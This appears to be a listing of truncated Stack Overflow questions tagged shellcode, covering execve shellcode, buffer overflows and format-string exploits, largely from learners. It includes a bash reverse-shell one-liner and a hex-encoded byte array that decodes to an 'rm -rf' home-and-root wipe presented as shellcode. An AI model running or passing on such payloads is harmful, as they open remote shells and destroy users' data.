Tagged Questions
0
votes
2 answers
101 views
Shellcode Segmentation Fault error when run from exploitable program
BITS 64
section .text
global _start
_start:
jmp short two
one:
pop rbx
xor al,al
xor cx,cx
mov al,8
mov cx,0755
int 0x80
xor al,al
inc al
xor bl,bl ...
-1
votes
1 answer
58 views
Running shellcode works in debugger, but not by itself
I'm experimenting with buffer overflows. I've written a toy example which does the following:
building a buffer which consists of three parts:
1) a block with several "malicious" return addresses ...
-1
votes
1 answer
41 views
What does this C snippet mean?
I'm a noob at shellcodes and I'm trying to understand all scenarios. I have found many codes to test my shellcodes in C, but to my surprise they are very unreadable and I can't understand neither ...
0
votes
2 answers
86 views
Shellcode buffer overflow - SegFault
I'm trying to run this shellcode but I keep getting segmentation fault
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include ...
-3
votes
2 answers
103 views
Assembly works, but shellcode does not [closed]
I have a x64 processor and I'm looking into shellcode.
I have the following code:
section .text
global _start
_start:
push rax
mov rbx, 0x68732f6e69622f2f
shr rbx, 0x8
push rbx
mov ...
-1
votes
1 answer
111 views
Shellcoder's Handbook: first shellcode example
I'm a little confused how the first shellcode example works. I've run it through GDB and I have verified it is correct, but I'm not sure how it ends up working in the first place. Here is what the ...
1
vote
2 answers
130 views
Executing machine code in an array in C. Is this executing an Integer?
I am trying to understand why ret(); works in the following C program:
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\...
1
vote
1 answer
134 views
Buffer overflow change return address C - without main
How can I get the eip register to point to memory address to execute my shellcode in the following program using buffer overflow?
static int __init onload(void)
{
void function1(char *arg1)
{...
0
votes
0 answers
79 views
ASM [open/read/write] shellcode segmentation fault
I'm trying to write a simple shellcode to read the content of a file.
Here is my assembly:
xor eax, eax
xor ecx, ecx
xor edx, edx
push 0x73 ; /home/users/level05/.pass
push ...
0
votes
1 answer
43 views
How the standards input passing stream different?
I'm a newbie in Linux and exploitation. I have tried to solve some exploitation challenges and I realize some interesting things.
[1](python -c 'print "a"*40 + "\xef\xbe\xad\xde"';cat ) | ./ch13
...
1
vote
1 answer
276 views
Executing shellcode in C (Visual Studio 2017)
I encounter a problem when I try to execute a shellcode in C, (a basic reverse_tcp, pointing to a local address).
I started from the basics with the following code:
#define WIN32_LEAN_AND_MEAN
#...
0
votes
2 answers
53 views
Executed shellcode terminates main program
I am trying to execute shellcode in a memory region. While it works so far, I am confronted with another problem right now: The main-c-program exits after I called the shellcode-program. Is there a (...
2
votes
1 answer
148 views
Hello World in ARM Assembly without data section
I have a "Hello, World!" program in ARM assembly language and I want to convert it into shell code to execute it in a memory region. In Intel Assembly language I got rid of the .data section since ...
2
votes
2 answers
102 views
32-bit shellcode executes in assembly but not in c on 64-bit os even with -m32
I'm working on a tcp-bind shellcode for a 32-bit system. The code is sitting on a 32-bit ubuntu and the host os is 64 Bit Windows 10 (do they even make 32 bit windows 10?)
The shellcode is a tcp-bind....
7
votes
1 answer
323 views
Executing shellcode in shared memory with mmap [duplicate]
I'm trying to place and execute program-code into a shared-memory region. Initializing and allocating the shared memory as well as copying the shellcode into the "new" memory works as intended, but as ...
0
votes
1 answer
321 views
gdb Cannot access memory at address of $ebp
The entire code is:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
char *secret = "1234";
void go_shell()
{
char *shell = "/bin/sh";
char *cmd[] = { "/bin/sh", 0};
...
0
votes
1 answer
136 views
Difference between running an assembly program and running the disassembled code in shellcode.c
I am currently working on 'Pentester Academy's x86_64 Assembly Language and Shellcoding on Linux' course (www.pentesteracademy.com/course?id=7). I have one simple question that I can't quite figure ...
0
votes
0 answers
52 views
Need help in understanding this exploit using the stack [duplicate]
I am recently reading Hacking: The Art of Exploitation. But I got stuck in this piece of code.
const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\...
1
vote
1 answer
285 views
Format string attack - jump to shell on x64
How to exploit a printf format string vulnerability on a 64-bit system with NX enabled?
In this code example, what could you do to get a shell?
void f(char *buf) {
printf(buf);
exit(0);
}
int main()...
0
votes
1 answer
82 views
Why didn't it print?
Simple asm for printing the string "/bin/sh" and then exiting
global _start:
_start:
jmp what
are:
mov rbx,0x68732f6e69622fff
shr rbx,0x8
push rbx
mov rsi,rsp
mov dl,0x8
...
2
votes
1 answer
191 views
How can you make the stack executable on osx?
I'm currently going through "Hacking; the Art of Exploitation", and am practicing writing shell code injections on some example code I wrote up.
I'm injecting shell code as an environment variable. ...
1
vote
0 answers
91 views
shellcode segmentation fault although assembly works well
I created an assembly program to execute a shell:
section .text
global _start
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ...
1
vote
1 answer
92 views
Iterating over PEB DllName shows only exe name
I'm trying to get a list of the loaded modules within my application (pertaining to security/shellcode so please refrain from WINAPI calls). I'm iterating over the PEB->Ldr doubly linked list of ...
0
votes
3 answers
138 views
Is it practical to create a C language addon for anonymous functions?
I know that C compilers are capable of taking standalone code, and generating standalone shellcode out of it for the specific system they are targeting.
For example, given the following in anon.c:
...
-5
votes
1 answer
295 views
C shellcode execution
I have the following program written in C:
char code[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
int main(int argc, char **...
0
votes
1 answer
261 views
execve x86 - Segmentation Fault
I keep getting segmentation faults on this. Could anybody help me on this one? I am kind of new to ASM.
global _start
section .text
_start:
push dword 0x0068732F ; Push /sh
push dword 0x6E69622F ;...
-2
votes
2 answers
105 views
C shellcode execution issue
I recently got interested in Metasploit, and I was trying to execute some shellcode from C code.
So I've generated with msfvenom a shellcode for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to ...
0
votes
1 answer
732 views
Testing Shellcode With GDB [duplicate]
If I just execute the shellcode program, it gives a segmentation fault like this:
desktop:~$ ./sh02
Segmentaion fault (core dumped)
But, when I debug this program with GDB, this program executes /bin/sh ...
0
votes
3 answers
44 views
Compiling ShellCode Program in C error
I am currently reading through a book about shellcoding and I am running into some issues during one of the examples. I am trying to compile the code below but I keep getting an error about stray "\". ...
0
votes
2 answers
118 views
Shellcode testing gone wrong
Hey I'm using a bit of code most of you are familiar with. It basically takes an array of characters and casts it as a function pointer. With this code you can theoretically test any shellcode's ...
2
votes
0 answers
124 views
Shellcode Segfault - testcase vs strcpy
So after taking a Software Security class I became very interested in tinkering with how shellcode works with buffer overflows. Most threads I read about the topic involve having the shellcode as a ...
1
vote
2 answers
2k views
Generating Shellcode from an exe?
So recently I have been learning about low level programming languages (such as Assembly, which from my understanding is just symbolic binary) and have come across Shellcoding (e.g. "\x4D..." etc). I ...
3
votes
1 answer
594 views
Can I execute code that resides in the data segment (ELF binary)?
On the way to understanding binaries (virtual memory layout, execution, etc.), I've written C code that declares a global string which contains bytes of executable code, then I overwrote the ...
0
votes
1 answer
40 views
Designing Shellcode gives incorrect results
I made this simple assembly program:
.text
.globl _start
_start:
mov %20, %rbx
mov %1, %rax
int $0x80
This is obviously running on a 64 bit OS (Linux). I then ...
-2
votes
1 answer
383 views
Making my C program execute shellcode [closed]
I was trying to make my C program execute shellcode. Please look at the following.
root@ninja:~/Desktop/Programs# gdb -q ./a.out
Reading symbols from /root/Desktop/Programs/a.out...done.
(gdb) list 1
...
5
votes
1 answer
538 views
Why can the execve system call run “/bin/sh” without any argv arguments, but not “/bin/ls”?
I am confused with the __NR_execve syscall. When I learn about Linux system calls, the correct way that I know to use execve is like this:
char *sc[2];
sc[0]="/bin/sh";
sc[1]= NULL;
execve(sc[0],sc,...
1
vote
0 answers
44 views
Shellcoding problems at Basics
Hi and good evening to everyone.
I am venturing into security, but I need to understand a few things, buffer overflows, etc. Now I also want to know shellcoding.
So I got my CFF Explorer ready, got my C IDE (...
0
votes
1 answer
418 views
bash -i >& /dev/tcp/127.0.0.1/1234 0>&1
I know that some part of the above title has already been asked but I still have some confusions. Actually, I don't really get the ">&" in bash -i >& /dev/tcp/127.0.0.1/1234 0>&1
My main ...
-2
votes
2 answers
69 views
Can you help me explaining the following C code? [duplicate]
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
the variable code has some shellcode in it
0
votes
0 answers
152 views
Shellcode Without null bytes
I am trying to convert an assembly program into null-free shellcode.
However, I am unsure how to go about this for certain instructions. Some of them are way more complex than the examples I found in the ...
-2
votes
3 answers
116 views
Pointers to function
What does this code mean?
char code[] = "bytecode will go here!";
int main(int argc, char **argv) {
int (*func)(); /* This is pointer to function */
func = (int (*)())code; /* What does this ...
-1
votes
1 answer
181 views
This shellcode and headache
Good afternoon. I've been looking for a while what's happening with this shellcode. This is the asm code:
add esp, 0x3c
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, ...
0
votes
1 answer
103 views
Why is this shellcode causing a segmentation fault?
When I run the following code:
#include <stdio.h>
#include <string.h>
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\...
-2
votes
1 answer
241 views
Aleph one code - buffer overflow [closed]
I got this code of aleph one:
shellcode.h
#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\...
1
vote
1 answer
858 views
Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential
I'm looking at aleph's article on phrack magazine. The code below can also be found there.
We have a vulnerable executable whose code is:
vulnerable.c
void main(int argc, char *argv[]) {
...
1
vote
1 answer
111 views
Program doesn't respond to the shell code passed to it
I have a small C program on my local environment. This program receives a payload and outputs it.
#include <stdio.h>
#include <stdlib.h>
int main(int argc,char* argv[])
{
char buffer[...
-1
votes
1 answer
218 views
run shellcode stored in dynamically allowed memory
I have the following, which runs a shellcode that works fine:
unsigned char original[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\...
0
votes
2 answers
491 views
buffer overflow exploit change function call
I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over ...
-1
votes
5 answers
300 views
Reverse engineering assembly code to C
Would someone please provide me with assistance disassembling the shell code below (in the comment section) and also explain to me the role of the last line of code?
#include <stdlib.h>
# ...
4
votes
1 answer
1k views
Find buffer address to create shell code
In my program I am trying to modify the EIP to point to buffer base address which contains shell code
example:
0xbffff5f3 is an address on stack which points to
code[80] = "\x90\x90\x90\x90\x90\x31\...